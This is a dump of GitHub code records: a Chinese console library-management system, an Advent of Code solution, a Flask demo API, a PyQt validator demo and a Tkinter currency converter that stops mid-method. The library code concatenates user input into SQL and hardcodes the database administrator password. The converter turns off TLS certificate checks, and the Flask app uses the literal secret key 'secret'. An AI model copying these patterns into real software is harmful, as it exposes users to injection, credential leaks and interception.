data = cur.fetchall()\r\n if len(data) == 0:\r\n print(\"没有该书编号\")\r\n else:\r\n ch = input(\"请确认归还(Y/N):\")\r\n if ch == 'y' or ch == 'Y':\r\n sql = \"DELETE borrow WHERE bookid='\" + bookid + \"'\"\r\n cur.execute(sql)\r\n conn.commit()\r\n print(\"图书归还成功\")\r\n sql = \"UPDATE book SET quantity=1 WHERE quantity='\" + bookid + \"'\"\r\n cur.execute(sql)\r\n conn.close()\r\n os.system(\"pause\")\r\n\r\ndef readerm(): # 读者管理\r\n while True:\r\n os.system(\"cls\")\r\n print(\"===读者管理===\")\r\n print(\"1、添加读者\")\r\n print(\"2、删除读者\")\r\n print(\"3、查询读者\")\r\n print(\"4、修改读者\")\r\n print(\"0、回到上层菜单\")\r\n ch = input(\"请选择操作:\")\r\n if ch == '1':\r\n readeri()\r\n elif ch == '2':\r\n readerd()\r\n elif ch == '3':\r\n readers()\r\n elif ch == '4':\r\n readeru()\r\n elif ch == '0':\r\n break\r\n\r\ndef readeri(): # 读者插入\r\n os.system(\"cls\")\r\n print(\"==读者===\")\r\n print(\"请输入读者信息:\")\r\n rid = input(\"读者编号:\")\r\n rname = input(\"姓名:\")\r\n rsex = input(\"性别:\")\r\n runit = input(\"单位:\")\r\n rtel = input(\"电话:\")\r\n rtype = input(\"类型号:\")\r\n rmoney = input(\"余额:\")\r\n pw = input(\"密码:\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"INSERT INTO reader VALUES('\" + rid + \\\r\n \"','\" + rname + \\\r\n \"','\" + rsex + \\\r\n \"','\" + runit + \\\r\n \"','\" + rtel + \\\r\n \"','\" + rtype + \\\r\n \"','\" + rmoney + \\\r\n \"','\" + pw + \\\r\n \"')\"\r\n cur.execute(sql)\r\n conn.commit()\r\n conn.close()\r\n print(\"读者添加成功\")\r\n os.system(\"pause\")\r\n\r\ndef readerd(): # 读者删除\r\n os.system(\"cls\")\r\n print(\"===删除读者===\")\r\n print(\"请输入删除读者编号:\")\r\n rid = input(\"读者编号:\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"SELECT rid FROM reader WHERE rid='\" + rid + \"'\"\r\n cur.execute(sql)\r\n data = cur.fetchall()\r\n if len(data) == 0:\r\n print(\"没有该读者编号\")\r\n else:\r\n ch = input(\"请确认删除(Y/N):\")\r\n if ch == 'y' or ch == 'Y':\r\n sql = \"DELETE reader WHERE rid='\" + rid + \"'\"\r\n cur.execute(sql)\r\n conn.commit()\r\n print(\"读者删除成功\")\r\n conn.close()\r\n os.system(\"pause\")\r\n\r\ndef readers(): # 读者查询\r\n os.system(\"cls\")\r\n print(\"===查询读者===\")\r\n print(\"请输入你想查找的读者编号:\")\r\n rid = input(\"读者编号\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"SELECT rid FROM reader WHERE rid='\" + rid + \"'\"\r\n cur.execute(sql)\r\n data = cur.fetchall()\r\n if len(data)==0:\r\n print(\"没有该读者编号\")\r\n else:\r\n sql=\"SELECT * FROM reader WHERE rid='\"+rid+\"'\"\r\n cur.execute(sql)\r\n conn.close()\r\n print(\"读者查询成功\")\r\n os.system(\"pause\")\r\n\r\ndef readeru(): # 读者修改\r\n os.system(\"cls\")\r\n print(\"===修改读者===\")\r\n print(\"请输入你想修改的读者编号:\")\r\n rid = input(\"读者编号\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"SELECT rid FROM reader WHERE rid='\" + rid + \"'\"\r\n cur.execute(sql)\r\n data = cur.fetchall()\r\n if len(data)==0:\r\n print(\"没有该读者编号\")\r\n else:\r\n rname = input(\"姓名:\")\r\n rsex = input(\"性别:\")\r\n runit = input(\"单位:\")\r\n rtel = input(\"电话:\")\r\n rtype = input(\"类型号:\")\r\n rmoney = input(\"余额:\")\r\n pw = input(\"密码:\")\r\n sql=\"UPDATE reader SET rname=rname+%s,rsex=rsex+%s,runit=runit+%s,rtel=rtel+%s,rtype=rtype+%s,\\\r\n rmoney=rmoney+%s,pw=pw+%s WHERE rid='\"+rid+\"'\" %(rname,rsex,runit,rtel,rtype,rmoney,pw)\r\n cur.execute(sql)\r\n conn.commit()\r\n 
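        # NOTE: the UPDATE assembled above cannot run as written: % binds
        # more tightly than +, so the format arguments are applied only to
        # the trailing quote literal and raise TypeError; and even then,
        # rname=rname+%s would append to the stored value rather than
        # replace it. A hedged sketch of the intent with parameters (the
        # same fix applies to the analogous UPDATEs in booku() above and
        # adminu() below):
        #     sql = ('UPDATE reader SET rname=%s, rsex=%s, runit=%s, rtel=%s, '
        #            'rtype=%s, rmoney=%s, pw=%s WHERE rid=%s')
        #     cur.execute(sql, (rname, rsex, runit, rtel, rtype, rmoney, pw, rid))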
conn.close()\r\n print(\"读者修改成功\")\r\n os.system(\"pause\")\r\n\r\ndef adminm(): # 管理员管理\r\n while True:\r\n os.system(\"cls\")\r\n print(\"===管理员管理===\")\r\n print(\"1、添加管理员\")\r\n print(\"2、删除管理员\")\r\n print(\"3、修改管理员\")\r\n print(\"0、回到上层菜单\")\r\n ch = input(\"请选择操作:\")\r\n if ch == '1':\r\n admini()\r\n elif ch == '2':\r\n admind()\r\n elif ch == '3':\r\n adminu()\r\n elif ch == '0':\r\n break\r\n\r\ndef admini(): # 管理员插入\r\n os.system(\"cls\")\r\n print(\"==管理员===\")\r\n print(\"请输入管理员信息:\")\r\n aid = input(\"管理员编号:\")\r\n pw = input(\"密码:\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"INSERT INTO admin VALUES('\" + aid + \\\r\n \"','\" + pw + \\\r\n \"')\"\r\n cur.execute(sql)\r\n conn.commit()\r\n conn.close()\r\n print(\"管理员添加成功\")\r\n os.system(\"pause\")\r\n\r\ndef admind(): # 管理员删除\r\n os.system(\"cls\")\r\n print(\"===删除管理员===\")\r\n print(\"请输入删除管理员编号:\")\r\n aid = input(\"管理员编号:\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"SELECT aid FROM admin WHERE aid='\" + aid + \"'\"\r\n cur.execute(sql)\r\n data = cur.fetchall()\r\n if len(data) == 0:\r\n print(\"没有该管理员编号\")\r\n else:\r\n ch = input(\"请确认删除(Y/N):\")\r\n if ch == 'y' or ch == 'Y':\r\n sql = \"DELETE admin WHERE aid='\" + aid + \"'\"\r\n cur.execute(sql)\r\n conn.commit()\r\n print(\"管理员删除成功\")\r\n conn.close()\r\n os.system(\"pause\")\r\n\r\ndef adminu(): # 管理员修改\r\n os.system(\"cls\")\r\n print(\"===修改管理员===\")\r\n print(\"请输入你想修改的管理员编号:\")\r\n aid = input(\"管理员编号\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"SELECT aid FROM admin WHERE aid='\" + aid + \"'\"\r\n cur.execute(sql)\r\n data = cur.fetchall()\r\n if len(data)==0:\r\n print(\"没有该管理员编号\")\r\n else:\r\n pw = input(\"密码:\")\r\n sql=\"UPDATE admin SET pw=pw+%s WHERE aid='\"+aid+\"'\" %(pw)\r\n cur.execute(sql)\r\n conn.commit()\r\n conn.close()\r\n print(\"管理员修改成功\")\r\n os.system(\"pause\")\r\n\r\ndef readerlogin(): #读者登录\r\n os.system(\"cls\")\r\n print(\"===读者登录===\")\r\n global uniqueid\r\n uniqueid = input(\"请输入读者编号:\")\r\n pw = input(\"请输入读者密码:\")\r\n # 连接数据库BOOKS\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"SELECT * FROM reader WHERE rid='\" + uniqueid + \"' and pw='\" + pw + \"'\"\r\n cur.execute(sql)\r\n data = cur.fetchall()\r\n if len(data) == 0:\r\n print(\"编号或密码错误\")\r\n os.system(\"pause\")\r\n else:\r\n readermain()\r\n conn.close()\r\n\r\ndef readermain(): # 读者界面\r\n while True:\r\n os.system(\"cls\")\r\n print(\"===图书管理系统(读者)===\")\r\n print(\"1、图书查询\")\r\n print(\"2、借阅查询\")\r\n print(\"0、退出系统\")\r\n ch = input(\"请选择操作:\")\r\n if ch == '1':\r\n booksearch()\r\n elif ch == '2':\r\n borrowsearch()\r\n elif ch == '0':\r\n exit()\r\n\r\ndef booksearch(): # 查询图书界面\r\n os.system(\"cls\")\r\n print(\"===查询图书===\")\r\n print(\"请输入你想查找的图书编号:\")\r\n bookid = input(\"图书编号\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"SELECT bookid FROM book WHERE bookid='\" + bookid + \"'\"\r\n cur.execute(sql)\r\n data = cur.fetchall()\r\n if len(data) == 0:\r\n print(\"没有该书编号\")\r\n else:\r\n sql = \"SELECT * FROM book WHERE bookid='\" + bookid + \"'\"\r\n cur.execute(sql)\r\n conn.close()\r\n print(\"图书查询成功\")\r\n os.system(\"pause\")\r\n\r\ndef borrowsearch(): # 查询借阅界面\r\n os.system(\"cls\")\r\n 
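    # NOTE: like books(), readers() and booksearch() above, this function
    # executes its SELECT but never fetches or prints the result set, so
    # nothing is actually displayed to the user. A hedged sketch of the
    # missing display step:
    #     cur.execute('SELECT * FROM borrow WHERE rid=%s', (uniqueid,))
    #     for row in cur.fetchall():
    #         print(row)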
print(\"===查询借阅===\")\r\n conn = pymssql.connect(host='.', database='BOOKS', user='sa', password='1234')\r\n cur = conn.cursor()\r\n sql = \"SELECT * FROM borrow WHERE rid='\" + uniqueid + \"'\"\r\n cur.execute(sql)\r\n conn.close()\r\n os.system(\"pause\")\r\n\r\nfirst()\r\n#system(\"color DF\")\t改变屏幕背景颜色和文字颜色\r\n#0黑 1蓝 2绿 3湖蓝 4红 5紫 6黄 7白 8灰 9淡蓝 A淡绿 B淡浅绿 C淡红 D淡紫 E淡黄 F亮白\r\nos.system(\"color F0\")\r\nwhile True:\r\n os.system(\"cls\")\r\n print(\"===图书管理系统===\")\r\n print(\"1、管理员登录\")\r\n print(\"2、读者登录\")\r\n print(\"0、退出系统\")\r\n ch=input(\"请选择操作:\")\r\n if ch=='1':\r\n adminlogin()\r\n elif ch=='2':\r\n readerlogin()\r\n elif ch=='0':\r\n exit()\r\n#os.system(\"pause\")","repo_name":"Stargazer1949/Python","sub_path":"图书管理系统/图书管理系统.py","file_name":"图书管理系统.py","file_ext":"py","file_size_in_byte":18876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24658650958","text":"import itertools\nwith open(\"C:\\\\Advent\\\\day14.txt\", \"r\") as file:\n data = [x.strip() for x in file.read().splitlines()]\n mem, mem_p2 = {}, {}\n for x in data:\n if x.startswith('mask'):\n mask = x.split(' = ')[1]\n else:\n index = int(x.split('[')[1].split(']')[0])\n intval = int(x.split(' = ')[1])\n binaryval = (36-len(format(intval, 'b')))*'0'+format(intval, 'b')\n vals = [v for v in binaryval]\n for e in [i for i in range(len(mask)) if mask[i] != 'X']:\n vals[e] = mask[e]\n mem[index] = int(''.join(vals), 2)\n binaryindex = (36-len(format(index, 'b')))*'0'+format(index, 'b')\n index_vals = [v for v in binaryindex]\n for e in [i for i in range(len(mask)) if mask[i] != '0']:\n index_vals[e] = mask[e]\n x_indexes = [i for i in range(len(mask)) if mask[i] == 'X']\n options = list(itertools.product(['1','0'], repeat=len(x_indexes)))\n for e in range(len(options)):\n for i in range(len(options[e])):\n index_vals[x_indexes[i]] = options[e][i]\n mem_p2[int(''.join(index_vals), 2)] = intval \n print('Part 1: {}'.format(reduce(lambda x,y: x+y, [z for z in mem.values()])))\n print('Part 2: {}'.format(reduce(lambda x,y: x+y, [z for z in mem_p2.values()])))\n","repo_name":"Diderikdm/Advent-of-Code-2020","sub_path":"day 14 - part 1 & 2.py","file_name":"day 14 - part 1 & 2.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38525702998","text":"import os\nfrom flask import Flask, jsonify\n\nfrom api.read import read_blueprint\nfrom api.info import info_blueprint\nfrom api.create import create_blueprint\nfrom api.update import update_blueprint\nfrom api.auth import auth_blueprint\nfrom api.delete import delete_blueprint\n\napp = Flask(__name__)\napp.register_blueprint(read_blueprint)\napp.register_blueprint(info_blueprint)\napp.register_blueprint(create_blueprint)\napp.register_blueprint(update_blueprint)\napp.register_blueprint(auth_blueprint)\napp.register_blueprint(delete_blueprint)\n\napp.secret_key = \"secret\"\n\n\n@app.route('/')\n@app.route('/docs')\n@app.route('/doc')\ndef index():\n return \"\"\"\n
This is testing example API<br>
\n Available routes:<br>
\n Info block about requests<br>
\n Documentation - documentation<br>
\n Create - create data<br>
\n Read - read data<br>
\n Info - information about a request<br>
\n Update - modify and add data<br>
\n Auth - authorization<br>
\n \"\"\"\n\n\n@app.errorhandler(405)\ndef page_not_found(e):\n return jsonify({\"status\": \"error\", \"description\": \"method_not_allowed\"})\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=os.getenv(\"PORT\", 5000))\n","repo_name":"pavlovprojects/api_example","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"456376460","text":"from PyQt5.Qt import QApplication, QMainWindow\nfrom PyQt5.QtGui import QIntValidator, QValidator\nfrom PyQt5.QtWidgets import QWidget, QLineEdit, QPushButton, QVBoxLayout\nimport sys\n\n\n#https://doc.qt.io/qt-5/qvalidator.html\n#https://doc.qt.io/qt-5/qintvalidator.html\n\nclass MainWindow(QMainWindow):\n\n def __init__(self, *args, **kwargs):\n super(MainWindow, self).__init__(*args, **kwargs)\n\n self.layout = QVBoxLayout()\n self.le1 = QLineEdit()\n self.b1 = QPushButton(\"Validate\")\n self.le1.setPlaceholderText(\"value between 10 and 50\")\n\n self.layout.addWidget(self.le1)\n self.layout.addWidget(self.b1)\n\n self.w = QWidget()\n self.w.setLayout(self.layout)\n self.setCentralWidget(self.w)\n self.show()\n\n # Accepts input values from 1 to 99999, but Acceptable is from 1 to 10000\n self.int_validator = QIntValidator(1, 10000, self.le1)\n\n # Set restricted range from 10 to 50 - Accepts input values from 1 to 99, but accetable is from 10 to 50\n self.int_validator.setRange(10, 50)\n\n self.le1.setValidator(self.int_validator)\n\n # Should not be called if the value is not valid\n self.le1.editingFinished.connect(self.isValid)\n # Should not be called if the value is not valid\n self.le1.returnPressed.connect(self.isValid)\n self.b1.pressed.connect(self.isValid)\n\n def isValid(self):\n\n valid, _text, _npos = QIntValidator.validate(\n self.int_validator, self.le1.text(), self.le1.cursorPosition())\n\n if valid == QValidator.Acceptable:\n print(\"Valid \" + self.le1.text())\n\n elif valid == QValidator.Intermediate:\n print(\"Close, but not valid\")\n\n elif valid == QValidator.Invalid:\n print(\"This is clearly not valid\")\n\n\napp = QApplication(sys.argv)\nwindow = MainWindow()\napp.exec_()\n","repo_name":"ThomasOdegard/PyQt_snippets","sub_path":"QValidator.py","file_name":"QValidator.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"46628784710","text":"from tkinter import * #GUI\nimport time\nfrom PIL import Image, ImageTk #To import cover photo --> pip/pillow\nimport ssl\nimport urllib.request as ur\nimport re\nimport json\n\nroot = Tk()\n\nclass mainWindow(Frame): #Display main window\n def __init__(self, master=None):\n Frame.__init__(self, master)\n self.master = master\n self.init_window()\n\n def init_window(self):\n self.master.title(\"Brownies Converters\") #Window title\n self.pack(fill=BOTH, expand=1)\n\n self.Img()\n root.after(6300, self.Buttons)\n \n def Buttons(self):\n startButton = Button(self, text=\"Start\", command = self.start)\n startButton.place(x=295,y=400)\n\n quitbutton = Button(self, text=\"Quit Application\", command=self.app_exit)\n quitbutton.place(x=260, y=450)\n\n def Img(self): #Loading Screen\n load = Image.open(\"Logo_2.gif\")\n render = ImageTk.PhotoImage(load)\n img = Label(self, image=render)\n img.image = render\n img.place(x=120, y=0)\n root.after(700, self.Img2)\n def Img2(self):\n load = Image.open(\"Logo_2-2.jpg\")\n render = 
ImageTk.PhotoImage(load)\n img = Label(self, image=render)\n img.image = render\n img.place(x=120, y=0)\n root.after(700, self.Img3)\n def Img3(self):\n load = Image.open(\"Logo_2-3.jpg\")\n render = ImageTk.PhotoImage(load)\n img = Label(self, image=render)\n img.image = render\n img.place(x=120, y=0)\n root.after(700, self.Img4)\n def Img4(self):\n load = Image.open(\"Logo_2-4.jpg\")\n render = ImageTk.PhotoImage(load)\n img = Label(self, image=render)\n img.image = render\n img.place(x=120, y=0)\n root.after(700, self.Img5)\n def Img5(self):\n load = Image.open(\"Logo_2-5.jpg\")\n render = ImageTk.PhotoImage(load)\n img = Label(self, image=render)\n img.image = render\n img.place(x=120, y=0)\n root.after(700, self.Img6)\n def Img6(self):\n load = Image.open(\"Logo_2-6.jpg\")\n render = ImageTk.PhotoImage(load)\n img = Label(self, image=render)\n img.image = render\n img.place(x=120, y=0)\n root.after(700, self.Img7)\n def Img7(self):\n load = Image.open(\"Logo_2-7.jpg\")\n render = ImageTk.PhotoImage(load)\n img = Label(self, image=render)\n img.image = render\n img.place(x=120, y=0)\n root.after(700, self.Img8)\n def Img8(self):\n load = Image.open(\"Logo_2-8.jpg\")\n render = ImageTk.PhotoImage(load)\n img = Label(self, image=render)\n img.image = render\n img.place(x=120, y=0)\n root.after(700, self.Img9)\n def Img9(self):\n load = Image.open(\"Logo_2-9.jpg\")\n render = ImageTk.PhotoImage(load)\n img = Label(self, image=render)\n img.image = render\n img.place(x=120, y=0)\n \n def intro(self):\n intro1 = Label(root, text = \"Welcome to Currency Converter, prsented by Brownies converters!\")\n intro1.place(x=10, y=0)\n intro2 = Label(root, text = \"Currencies are updated everyday at 3:00 PM\")\n intro2.place(x=10, y=30)\n intro3 = Label(root, text = \"Click proceed or Enter/Return to continue\")\n intro3.place(x=10, y=60)\n e = Label(root, text=\" \")\n intro1.place(x=10, y=90)\n \n def start(self):\n load = Image.open(\"bg.jpg\") #Replace cover photo with background for\n photo = ImageTk.PhotoImage(load) #aesthetics\n\n img = Label(self, image=photo)\n img.image = photo\n img.pack() \n \n self.intro()\n global conget\n global toget\n\n OPTIONS = [\"---\", \"CAD\", \"USD\", \"EUR\", \"INR\", \"JPY\", \"BRL\", \"GBP\"]\n conget = StringVar(root)\n conget.set(OPTIONS[0])\n OPTIONS2 = [\"---\", \"CAD\", \"USD\", \"EUR\", \"INR\", \"JPY\", \"BRL\", \"GBP\"]\n toget = StringVar(root)\n toget.set(OPTIONS[0])\n \n con = Label(root, text=\"What currency do you want to convert from: \")\n con.place(x=50, y=145)\n var = OptionMenu(root, conget, *OPTIONS)\n var.place(x=370, y=145)\n\n to = Label(root, text=\"What currency do you want to convert to: \")\n to.place(x=50, y=185)\n var2 = OptionMenu(root, toget, *OPTIONS2)\n var2.place(x=370, y=185)\n\n convertButton = Button(self, text=\"Proceed\", command=self.convert)\n convertButton.place(x=268, y=450)\n root.bind(\"\", self.convertLink)\n def convertLink(self, event=None):\n self.convert()\n def convert(self): #Loads conversion for user\n conget.get()\n toget.get()\n\n if conget.get() == \"CAD\" and toget.get() == \"USD\":\n self.CAD_to_USD()\n elif conget.get() == \"CAD\" and toget.get() == \"EUR\":\n self.CAD_to_EUR()\n elif conget.get() == \"CAD\" and toget.get() == \"INR\":\n self.CAD_to_INR()\n elif conget.get() == \"CAD\" and toget.get() == \"JPY\":\n self.CAD_to_JPY()\n elif conget.get() == \"CAD\" and toget.get() == \"BRL\":\n self.CAD_to_BRL()\n elif conget.get() == \"CAD\" and toget.get() == \"GBP\":\n self.CAD_to_GBP()\n \n elif 
conget.get() == \"USD\" and toget.get() == \"CAD\":\n self.USD_to_CAD()\n elif conget.get() == \"USD\" and toget.get() == \"EUR\":\n self.USD_to_EUR()\n elif conget.get() == \"USD\" and toget.get() == \"INR\":\n self.USD_to_INR()\n elif conget.get() == \"USD\" and toget.get() == \"JPY\":\n self.USD_to_JPY()\n elif conget.get() == \"USD\" and toget.get() == \"BRL\":\n self.USD_to_BRL()\n elif conget.get() == \"USD\" and toget.get() == \"GBP\":\n self.USD_to_GBP()\n \n elif conget.get() == \"EUR\" and toget.get() == \"CAD\":\n self.EUR_to_CAD()\n elif conget.get() == \"EUR\" and toget.get() == \"USD\":\n self.EUR_to_USD()\n elif conget.get() == \"EUR\" and toget.get() == \"INR\":\n self.EUR_to_INR()\n elif conget.get() == \"EUR\" and toget.get() == \"JPY\":\n self.EUR_to_JPY()\n elif conget.get() == \"EUR\" and toget.get() == \"BRL\":\n self.EUR_to_BRL()\n elif conget.get() == \"EUR\" and toget.get() == \"GBP\":\n self.EUR_to_GBP()\n\n elif conget.get() == \"INR\" and toget.get() == \"CAD\":\n self.INR_to_CAD()\n elif conget.get() == \"INR\" and toget.get() == \"USD\":\n self.INR_to_USD()\n elif conget.get() == \"INR\" and toget.get() == \"EUR\":\n self.INR_to_EUR()\n elif conget.get() == \"INR\" and toget.get() == \"JPY\":\n self.INR_to_JPY()\n elif conget.get() == \"INR\" and toget.get() == \"BRL\":\n self.INR_to_BRL()\n elif conget.get() == \"INR\" and toget.get() == \"GBP\":\n self.INR_to_GBP()\n \n elif conget.get() == \"JPY\" and toget.get() == \"CAD\":\n self.JPY_to_CAD()\n elif conget.get() == \"JPY\" and toget.get() == \"USD\":\n self.JPY_to_USD()\n elif conget.get() == \"JPY\" and toget.get() == \"EUR\":\n self.JPY_to_EUR()\n elif conget.get() == \"JPY\" and toget.get() == \"INR\":\n self.JPY_to_INR()\n elif conget.get() == \"JPY\" and toget.get() == \"BRL\":\n self.JPY_to_BRL()\n elif conget.get() == \"JPY\" and toget.get() == \"GBP\":\n self.JPY_to_GBP()\n \n elif conget.get() == \"BRL\" and toget.get() == \"CAD\":\n self.BRL_to_CAD()\n elif conget.get() == \"BRL\" and toget.get() == \"USD\":\n self.BRL_to_USD()\n elif conget.get() == \"BRL\" and toget.get() == \"EUR\":\n self.BRL_to_EUR()\n elif conget.get() == \"BRL\" and toget.get() == \"INR\":\n self.BRL_to_INR()\n elif conget.get() == \"BRL\" and toget.get() == \"JPY\":\n self.BRL_to_JPY()\n elif conget.get() == \"BRL\" and toget.get() == \"GBP\":\n self.BRL_to_GBP()\n\n elif conget.get() == \"GBP\" and toget.get() == \"CAD\":\n self.GBP_to_CAD()\n elif conget.get() == \"GBP\" and toget.get() == \"USD\":\n self.GBP_to_USD()\n elif conget.get() == \"GBP\" and toget.get() == \"EUR\":\n self.GBP_to_EUR()\n elif conget.get() == \"GBP\" and toget.get() == \"INR\":\n self.GBP_to_INR()\n elif conget.get() == \"GBP\" and toget.get() == \"JPY\":\n self.GBP_to_JPY()\n elif conget.get() == \"GBP\" and toget.get() == \"BRL\":\n self.GBP_to_BRL()\n \n elif conget.get() == \"---\" and toget.get() == \"---\":\n global pls\n pls = Label(self, text=\"Please choose currencies\")\n pls.place(x=227, y=370)\n root.after(750, self.plsDestroy)\n else:\n error = Label(self, text=\"Sorry, Not Supported\")\n error.place(x=240, y=370)\n def plsDestroy(self):\n pls.destroy()\n def again(self): #convert again or not\n global ag\n again = Label(root, text=\"Would you like to convert again?\")\n again.place(x=90, y=300)\n agButton = Button(self, text=\"Yes\", command=self.ting)\n agButton.place(x=400, y=300)\n agButton2 = Button(self, text=\"No\", command=self.endingTitle)\n agButton2.place(x=460, y=300)\n def ting(self):\n self.pack_forget()\n 
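        # NOTE: the thirty-odd *_to_* methods below differ only in their
        # prompt text and the parsed['rates'][...] key, so the long elif
        # chain in convert() could collapse into one generic handler; a
        # hedged sketch (method name invented for illustration):
        #     def do_convert(self, amount):
        #         context = ssl._create_unverified_context()
        #         url = 'https://api.fixer.io/latest?base={}'.format(conget.get())
        #         parsed = json.loads(ur.urlopen(url, context=context).read().decode('utf-8'))
        #         return amount * parsed['rates'][toget.get()]
        # Also note: every root.bind('', ...) in this file has lost its key
        # sequence (the Enter/Return hint in intro() suggests it was
        # '<Return>'), and INR_to_BRL() assigns user_ask2 but then calls
        # user_ask22.place(...), which raises NameError at runtime.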
app=mainWindow(root)\n \n def CAD_to_USD(self): #Conversion rates \n global user_value\n user_ask = Label(root, text =\"How many Canadian dollars? \")\n user_ask.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value.place(x=370, y=225)\n\n calcButton = Button(self, text=\" Convert \", command=self.cal)\n calcButton.place(x=265, y=450)\n root.bind(\"\", self.linkCal)\n def linkCal(self, event=None):\n self.cal()\n def cal(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n usd_rate = parsed[\"rates\"][\"USD\"]\n\n val= float(user_value.get()) * (usd_rate)\n int(val)\n\n x = Label(root, text=\"USD: \")\n x.place(x=250, y=265)\n out = Label(root)\n out.config(text = '{:0.2f}'.format(val))\n out.place(x=380, y=265)\n self.again()\n\n def CAD_to_EUR(self):\n global user_value2\n user_ask2 = Label(root, text =\"How many Canadian dollars? \")\n user_ask2.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value2 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value2.place(x=370, y=225)\n\n calcButton2 = Button(self, text=\" Convert \", command=self.cal2)\n calcButton2.place(x=265, y=450)\n root.bind(\"\", self.linkCal2)\n def linkCal2(self, event=None):\n self.cal2()\n def cal2(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n eur_rate = parsed[\"rates\"][\"EUR\"]\n\n val2= float(user_value2.get()) * (eur_rate)\n int(val2)\n\n x2 = Label(root, text=\"EUR: \")\n x2.place(x=250, y=265)\n out2 = Label(root)\n out2.config(text = '{:0.2f}'.format(val2))\n out2.place(x=380, y=265)\n\n self.again()\n\n def CAD_to_INR(self):\n global user_value6\n user_ask6 = Label(root, text =\"How many Canadian dollars? \")\n user_ask6.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value6 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value6.place(x=370, y=225)\n\n calcButton6 = Button(self, text=\" Convert \", command=self.cal6)\n calcButton6.place(x=265, y=450)\n root.bind(\"\", self.linkCal6)\n def linkCal6(self, event=None):\n self.cal6()\n def cal6(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n inr_rate = parsed[\"rates\"][\"INR\"]\n\n val6= float(user_value6.get()) * (inr_rate)\n int(val6)\n\n x6 = Label(root, text=\"INR: \")\n x6.place(x=250, y=265)\n out6 = Label(root)\n out6.config(text = '{:0.2f}'.format(val6))\n out6.place(x=380, y=265)\n\n self.again()\n\n def CAD_to_JPY(self):\n global user_value12\n user_ask12 = Label(root, text =\"How many Canadian dollars? 
\")\n user_ask12.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value12 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value12.place(x=370, y=225)\n\n calcButton12 = Button(self, text=\" Convert \", command=self.cal12)\n calcButton12.place(x=265, y=450)\n root.bind(\"\", self.linkCal12)\n def linkCal12(self, event=None):\n self.cal12()\n def cal12(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n jpy_rate = parsed[\"rates\"][\"JPY\"]\n\n val12= float(user_value12.get()) * (jpy_rate)\n int(val12)\n\n x12 = Label(root, text=\"JPY: \")\n x12.place(x=250, y=265)\n out12 = Label(root)\n out12.config(text = '{:0.2f}'.format(val12))\n out12.place(x=380, y=265)\n\n self.again()\n\n def CAD_to_BRL(self):\n global user_value20\n user_ask20 = Label(root, text =\"How many Canadian dollars? \")\n user_ask20.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value20 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value20.place(x=370, y=225)\n\n calcButton20 = Button(self, text=\" Convert \", command=self.cal20)\n calcButton20.place(x=265, y=450)\n root.bind(\"\", self.linkCal20)\n def linkCal20(self, event=None):\n self.cal20()\n def cal20(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n brl_rate = parsed[\"rates\"][\"BRL\"]\n\n val20= float(user_value20.get()) * (brl_rate)\n int(val20)\n\n x20 = Label(root, 